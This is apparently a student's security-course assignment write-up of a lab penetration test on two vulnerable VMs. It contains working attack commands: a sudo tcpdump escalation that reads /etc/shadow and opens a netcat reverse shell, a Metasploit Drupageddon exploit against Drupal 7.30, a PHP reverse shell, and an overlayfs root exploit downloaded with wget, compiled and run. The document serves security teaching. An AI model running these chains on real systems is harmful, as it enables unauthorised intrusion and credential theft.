# STL 2 Assignment 2
# 7
nmap scan on Vulnerable VM 1 (Web Developer VM)
Example Site
TCPdump exploit :
- https://gtfobins.github.io/gtfobins/tcpdump/
- https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux
- https://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/
```
echo $'id\ncat /etc/shadow' > /tmp/.shell
chmod +x /tmp/.shell
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root
```
The `/etc/shadow` file can be seen on the shell. But from this we still need to obtain full root access. To obtain complete 'root' privileges, I made changes to the initial line of the code in order to initiate a reverse shell using netcat. Since the netcat version on the virtual machine (VM) did not support the 'e' option, I employed the " /tmp/backpipe" technique.
Reference:
- https://spencerdodd.github.io/2017/02/21/reverse_shell_without_nce/
Commands:
```
mknod /tmp/backpipe p
echo $'/bin/sh 0</tmp/backpipe | nc 10.0.2.15 1234 1>/tmp/backpipe' > /tmp/.shell
chmod +x /tmp/.shell
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root
```
In order to achieve this, the first connection to the php server should be broken first and `nc -lvp 1234` command is run again such that it is ready to receive the incoming data. The following is the proof that the reverse-shell as `root` has worked as we are able to view the `/etc/shadow` file.
Explanation of `sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root` :
```
tcpdump: This is the main command for capturing network traffic. It analyzes network packets and can be used to monitor and analyze network activity.
-ln: These options instruct tcpdump to display the captured packets using numeric values instead of resolving them to human-readable names. It avoids DNS lookups and improves performance.
-i eth0: This option specifies the network interface to capture packets from. In this case, it is set to eth0, but you can replace it with the appropriate interface for your system.
-w /dev/null: This option specifies the output file to write the captured packets. In this case, /dev/null is used, which is a special file that discards any data written to it. Therefore, no packet capture file is created.
-W 1: This option sets the number of rotation intervals for the capture file. It limits tcpdump to capture packets for one file and then exit.
-G 1: This option sets the time interval for creating a new capture file. In this case, a new file will be created every one second.
-z /tmp/.shell: This option specifies the command or script to execute after each capture file is closed. Here, /tmp/.shell refers to a shell script that will be executed.
-Z root: This option sets the user to run the shell script specified with -z option. In this case, the script is executed as the root user.
```
# 8
`nmap -sP 10.0.2.0/24`
`nmap -Pn 10.0.2.9`
We see that a website is running.
We see it running in PHP
/includes
/misc
/modules
/profiles
/scripts
/sites
/theme
After digging around, the following is found under `/profiles/standard.info`
```
name = Standard
description = Install with commonly used features pre-configured.
version = VERSION
core = 7.x
dependencies[] = block
dependencies[] = color
dependencies[] = comment
dependencies[] = contextual
dependencies[] = dashboard
dependencies[] = help
dependencies[] = image
dependencies[] = list
dependencies[] = menu
dependencies[] = number
dependencies[] = options
dependencies[] = path
dependencies[] = taxonomy
dependencies[] = dblog
dependencies[] = search
dependencies[] = shortcut
dependencies[] = toolbar
dependencies[] = overlay
dependencies[] = field_ui
dependencies[] = file
dependencies[] = rdf
; Information added by Drupal.org packaging script on 2014-07-24
version = "7.30"
project = "drupal"
datestamp = "1406239730"
```
Now we know that the CMS version is `Drupal 7.30`. There is an exploit for this version of the CMS which can be found in the following:
- https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon/
Since we are allowed to use metasploit based on the instructions, we will be using metasploit to do this part of the assignment:
Using Metasploit, the following command was run to create an admin account:
> `msfconsole -q # To start the metasploit`
> `use exploit/multi/http/drupal_drupageddon`
> `show targets`
> `set RHOSTS 10.0.2.9`
> `set TARGET 1`
> `show options`
> `exploit`
We now have a new admin user and password:
- Username : FfqFgzmphl
- Password : CZkpzDrEIw
We can now log into the website as admin.
> Add basic page and copy over the reverse-shell php code from github: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
> Currently we have access to a reverse shell but no root access yet.
> `whoami` and `id` were run to verify the privilege
> `lsb_release -a` was run to verify the linux version used (Ubuntu 14.04)
> A possible exploit to excalate privilege can be found in the following:
- https://www.rapid7.com/db/modules/exploit/linux/local/overlayfs_priv_esc/
- https://www.oreilly.com/library/view/mastering-metasploit/9781788990615/5745a498-92aa-4b92-871e-56fbf8f7fb68.xhtml
> Since `overlayfs privilege escalation vulnerability` is a local user privilege escalation, we will be escalating from the reverse shell instead of using metasploit automation. The following commands are run to exploit the vulnerability.
```
cd /tmp/
wget https://www.exploit-db.com/raw/37292
mv 37292 37292.c
gcc 37292.c -o exploit
./exploit
```
The following is the result:
With the # sign it is a good indication that we are already at toor privileges. However to further prove the privilege, the following are run:
```
whoami
id
ifconfig # mainly this is to show that we are not in the wrong machine
```
Sign in with Wallet
Connect another wallet